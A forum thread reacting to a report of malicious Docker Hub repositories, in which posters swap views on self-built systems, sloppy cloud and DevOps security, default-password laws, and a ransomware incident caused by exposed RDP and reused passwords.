Millions of Docker repos found pushing malware, phishing sites

Zarathustra[H] said:
I don't know why people insist on using shitty pre-configured appliances.

Install and configure it yourself either bare metal or in a VM. Then you know what its on it.
Click to expand...
Heck yeah. My TrueNAS Scale system was built by me from scratch and I wouldn't have it any other way.
 
Lakados said:
https://www.bleepingcomputer.com/ne...er-repos-found-pushing-malware-phishing-sites

Why do people try so hard to ruin nice things?

But seriously I knew a lot of docker repositories were bad but 18.7% .... I would not have guessed that.
Click to expand...

18.7% :eek:

Still not sure how people are getting bit by these? Are they squatting common typos? I guess people just glance over that they have zero pulls... and then click a random link and get phished or download something!?

Zarathustra[H] said:
I don't know why people insist on using shitty pre-configured appliances.

Install and configure it yourself either bare metal or in a VM. Then you know what its on it.
Click to expand...

Or I just look at the Dockerfile. Then I know what's on it.
 
Zarathustra[H] said:
I don't know why people insist on using shitty pre-configured appliances.

Install and configure it yourself either bare metal or in a VM. Then you know what its on it.
Click to expand...
It is the same people (cough, devs cough) who configure cloud services and leave S3 buckets wide open, RDP wide open on new VMs and skip every other basic security control (do not even add MFA to their AWS root account and use it for day to day tasks....)

Companies keep supporting this because all they want to hire is developers, DevOps (who seldom understand the Ops part) and just want things pushed via a command in github and tadda, we are live! All done...

They some how think grabbing some pre-configured docket container or app from some random website is safe cause "derp derp"...

Ya, this stuff hits a nerve with me because there are people deploying "infrastructure" who have no bloody business even thinking about doing it, let alone actually doing it.
 
socK said:
18.7% :eek:

Still not sure how people are getting bit by these? Are they squatting common typos? I guess people just glance over that they have zero pulls... and then click a random link and get phished or download something!?



Or I just look at the Dockerfile. Then I know what's on it.
Click to expand...
Because they are the same idiots who just copy and paste random code from github repo's because they really have no business being a developer. Some of these malicious actors are sneaky and do copy other projects and use URLs close or names the same and they know most people do not pay any attention these days, just click and go!
 
MrGuvernment said:
It is the same people (cough, devs cough) who configure cloud services and leave S3 buckets wide open, RDP wide open on new VMs and skip every other basic security control (do not even add MFA to their AWS root account and use it for day to day tasks....)

Companies keep supporting this because all they want to hire is developers, DevOps (who seldom understand the Ops part) and just want things pushed via a command in github and tadda, we are live! All done...

They some how think grabbing some pre-configured docket container or app from some random website is safe cause "derp derp"...

Ya, this stuff hits a nerve with me because there are people deploying "infrastructure" who have no bloody business even thinking about doing it, let alone actually doing it.
Click to expand...

That's depressing.

I was reading this article the other day about California's new(ish) law requiring unique passwords for every device (or a system that forces a unique password to be set upon setup).

I googled it after noticing that all of my recent switch, AP and server motherboard purchases came with unique password labels on them that they didn't used to have, and wondered why that happened.

As I was reading it I was thinking to myself "Stupid overreaching California. These servers, access points and other impacted enterprise products are going to be set up by professionals who would never leave a default password in place."

I guess I was wrong. Very wrong.

Maybe California's nannying is the right approach after all...
 
Zarathustra[H] said:
That's depressing.

I was reading this article the other day about California's new(ish) law requiring unique passwords for every device (or a system that forces a unique password to be set upon setup).

I googled it after noticing that all of my recent switch, AP and server motherboard purchases came with unique password labels on them that they didn't used to have, and wondered why that happened.

As I was reading it I was thinking to myself "Stupid overreaching California. These servers, access points and other impacted enterprise products are going to be set up by professionals who would never leave a default password in place."

I guess I was wrong. Very wrong.

Maybe California's nannying is the right approach after all...
Click to expand...
I get called in to fix that sort of stuff all the time, cleanup is a bitch and far far too many assume they know what they are doing, it won’t happen to them. They are careful.

Same reason you can expect to see mandatory emergency blade stop devices on table saws sold in the us in the near future.
 
Lakados said:
I get called in to fix that sort of stuff all the time, cleanup is a bitch and far far too many assume they know what they are doing, it won’t happen to them. They are careful.

Same reason you can expect to see mandatory emergency blade stop devices on table saws sold in the us in the near future.
Click to expand...

I did work for a company that refused to take action on a server that had RDP open to the Internet. I tried everything possible to get them to do _anything_ about the fucking thing. Got shot down on everything.

They got crypto'd a couple years later. A user on said server had a shit password, which let the attacker get on it and lie in wait. Eventually some dipshit logged into it as domain admin and the credentials were harvested.

As a bonus, they used the same password for VMware VCenter. Entire domain and VMware instantly and completely compromised.
 
Lakados said:
I get called in to fix that sort of stuff all the time, cleanup is a bitch and far far too many assume they know what they are doing, it won’t happen to them. They are careful.
Click to expand...

...but I'm not even a professional. I just play with this stuff in my basement in my house, and even I know better,

How do these people get jobs doing what they do? :eek:
 
Zarathustra[H] said:
...but I'm not even a professional. I just play with this stuff in my basement in my house, and even I know better,

How do these people get jobs doing what they do? :eek:
Click to expand...
I know kids at McDonald's who make more than some IT "Professionals" at those companies, you get what you pay for. And if you pay garbage then you get the people who have no other options other than to work for that garbage pay.

The other side of it would be "Professional Installers" They come in they set it up to the barebones, then turn over the default information to the manager or owners or whoever with instructions to change it accordingly and leave. Then they never do, because they are too cheap to hire IT and take it on themselves but don't actually know how to do it.
 
Zarathustra[H] said:
That's depressing.

I was reading this article the other day about California's new(ish) law requiring unique passwords for every device (or a system that forces a unique password to be set upon setup).

I googled it after noticing that all of my recent switch, AP and server motherboard purchases came with unique password labels on them that they didn't used to have, and wondered why that happened.

As I was reading it I was thinking to myself "Stupid overreaching California. These servers, access points and other impacted enterprise products are going to be set up by professionals who would never leave a default password in place."

I guess I was wrong. Very wrong.

Maybe California's nannying is the right approach after all...
Click to expand...
Very VERY VERy wrong... sadly :( Look at all these major breaches, usually comes down to no MFA enabled (ChangeHealth card) or admin using crap passwords, or other elevated users using personal devices and getting infected with info-stealers.
 
You must log in or register to reply here.
Back
Top